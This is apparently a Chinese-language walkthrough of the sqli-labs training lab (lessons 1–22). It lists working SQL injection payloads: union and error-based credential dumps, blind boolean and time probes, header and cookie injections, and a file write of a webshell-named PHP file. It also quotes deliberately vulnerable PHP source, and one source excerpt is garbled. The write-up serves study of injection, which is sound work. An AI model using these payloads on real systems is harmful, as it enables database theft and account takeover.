less 1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
http://localhost/sqli-labs/Less-1/?id=-1' or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 1,1 --+
less 2 GET - Error based - Intiger based (基于错误的GET整型注入)
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 0,1 %23
less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)
http://localhost/sqli-labs/Less-3/?id=-1%27) union select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 6,1 --+
less 4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
http://localhost/sqli-labs/Less-4/?id=1") union select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 1,1 --+less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a%23
less 6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)
http://localhost/sqli-labs/Less-6/?id=1" union select count(*),1, concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a%23
less 7 GET - Dump into outfile - String (导出文件GET字符型注入)
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,'2','' into outfile 'E:\\wamp\\www\\sqli-labs\\muma.php' %23
less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
sqlmap 跑跑跑
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1)>64 %23 返回正确,大于64
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>96 %23 返回正确,大于96
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))<123 %23 返回正确,小于123 ,区间在97-122
less 9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
sqlmap 跑跑跑
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23
less 10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)
把上面的改成双引号就行判断为基于时间的双引号注入
http://localhost/sqli-labs/Less-10/?id=1" and sleep(5) %23
less 11
11-20 为post,要用到抓包,这里在burpsuit中改包
uname=admin' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1))) --+&passwd=aaa&submit=Submit
等等进行注入。less 12
原理都是一样的,只要加上双引号和)就行了
why?
在12的源码中
@sql="SELECT username, password FROM users WHERE username=##( sql="SELECT username, password FROM users WHERE username=##( uname)## and password=( passwd)LIMIT0,1”;在这里有个( p a s s w d ) L I M I T 0 , 1 ” ; 在 这 里 有 个 ( uname) 在双引号的基础上,还要加上右边的括号才行
uname=admin") and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1))) %23&passwd=aaa&submit=Submit
less 13 Double Injection- String- with twist 双注入 - 字符型 - 变形
这里给出开头的,剩下的自己想,另外:在双查询语句中是有一个固定公式的
name= -1’ union select 1 from (select+count(*),concat(( 注入爆数据语句),floor(rand(0)*2))a from information_schema.tables group by a)b %23 &passwd=
uname= ') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,database(),0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a %23 &passwd= ') or 1=1 %23 &submit=Submit
less 14 这道题跟上面的一样,只要把单引号改成双引号即可
uname= " union select 1 from (select count(*),concat(( select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a)b %23 &passwd= ') or 1=1 &submit=Submit
Less - 15 Blind- Boolian Based- String 盲注 - 基于布尔值 - 字符串
这里存在布尔还有时间盲注
可以通过以下三个判断出来,判断用burp的render里显示的图片,剩下的可以用burp了。。懒得手工(burp我没试出来)
uname=admin' and 1=1 --+&passwd=admin&submit=Submit
uname=admin' and 1=2 --+&passwd=admin&submit=Submit
uname=admin' and sleep(4) --+&passwd=admin&submit=Submit
Less - 16 Blind- Time Based- Double quotes- String 盲注 - 基于时间 - 双引号 - 字符串
这里加上双引号和),其余步骤都是一样的
uname=admin") and 1=1 --+&passwd=admin&submit=Submit
Less - 17 Update Query- Error based - String 更新查询 - 基于错误 - 字符串
这题目。。很迷,在正常网络里,应该不会有的吧
考的是密码重置,输入框就一个用户名,一个新密码,猜对用户名就好
用之前题目里爆出的用户名加上任意密码就好
这里是源码,这里可以看出来只选取了用户名,并随后更新密码
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$row1 = $row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
if (mysql_error()){
print_r(mysql_error());
}else{
}
echo '';
}else{
echo '';
}Less - 18 Header Injection- Error Based- string 头部注入 - 基于错误 - 字符串这里的源码说,插入uagent到security里面,这里就出现了注入
在这里需要先登录正确的帐号密码才能开始处理uagent,所以先输入个Dumb;Dumb。然后爆出了Your User Agent is:xxx
在burp中的User-Agent:里面输入
'and updatexml(1,concat(0x3a,database()),1))#
进行注入,后面的自己做,这里要注意:
1.#不能用%23来换
2.updatexml的第一个和三个字段可以是任何比如‘1’, 0等Less - 19 Header Injection- Referer- Error Based- string 头部注入 - Referer字段 - 基于错误- 字符串
跟上文一样的起始步骤,我就不赘述了,甩一个做到一半的注入上来参考
Referer: 'or updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema="security" limit 1,1)),1))#
less 20 POST - Cookie injections - Uagent field - Error based 基于错误的cookie头部POST注入
这里的步骤也一样,登陆账号后,在cookie里面注入,让账号报错显示
Cookie: uname=-Dumb' union select 1,2, table_name from information_schema.tables where table_schema="security" #
less 21 Cookie Injection- Error Based- complex - string 基于错误的复杂的字符型Cookie注入
跟20是一样的,只是要先base64一下
Cookie:uname=LUR1bWInKSB1bmlvbiBzZWxlY3QgMSwyLHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0ic2VjdXJpdHkiICM=
就是-Dumb') union select 1,2,table_name from information_schema.tables where table_schema="security" #
剩下的自己弄less 22 Cookie Injection- Error Based- Double Quotes - string 基于错误的双引号字符型Cookie注入
这几道题都一样
Cookie:uname=InVuaW9uIHNlbGVjdCAxLDIsZW1haWxfaWQgZnJvbSBlbWFpbHMj
base64为"union select 1,2,email_id from emails#